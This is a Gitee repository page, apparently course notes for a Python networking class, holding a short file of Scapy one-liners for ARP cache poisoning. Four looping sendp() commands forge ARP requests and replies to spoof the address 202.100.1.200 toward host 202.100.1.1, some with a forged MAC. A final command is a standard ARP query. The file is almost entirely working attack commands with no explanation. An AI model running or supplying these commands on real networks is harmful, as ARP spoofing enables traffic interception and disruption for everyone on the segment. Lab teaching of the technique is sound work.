1 Star 0 Fork 45

MarshalL/qytang_Python

加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
克隆/下载
2016.03.09 Scapy ARP毒化 839 Bytes
一键复制 编辑 原始数据 按行查看 历史
现任明教教主-乾颐堂 提交于 2016-03-08 10:41 . new file
使用"Who_is"毒化:
sendp(Ether(dst='00:01:00:01:00:01')/ARP(op=1, psrc='202.100.1.200', pdst='202.100.1.1'), inter=1, iface ='eno33554944', loop=1)
sendp(Ether(dst='00:01:00:01:00:01')/ARP(op=1, hwsrc='00:03:00:03:00:03', psrc='202.100.1.200', pdst='202.100.1.1'), inter=1, iface ='eno33554944', loop=1)
使用"is_at"毒化:
sendp(Ether(dst='00:01:00:01:00:01')/ARP(op=2, psrc='202.100.1.200', pdst='202.100.1.1'), inter=1, iface ='eno33554944', loop=1)
sendp(Ether(dst='00:01:00:01:00:01')/ARP(op=2, hwsrc='00:03:00:03:00:03', hwdst='00:01:00:01:00:01', psrc='202.100.1.200', pdst='202.100.1.1'), inter=1, iface ='eno33554944', loop=1)
标准ARP查询:
srp(Ether(dst='FF:FF:FF:FF:FF:FF')/ARP(op=1, hwsrc='00:0c:29:79:88:9a', hwdst='00:00:00:00:00:00', psrc='202.100.1.138', pdst='202.100.1.200'), iface ='eno33554944')
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化
Python
1
https://gitee.com/ymarshall/qytang_Python.git
git@gitee.com:ymarshall/qytang_Python.git
ymarshall
qytang_Python
qytang_Python
master

搜索帮助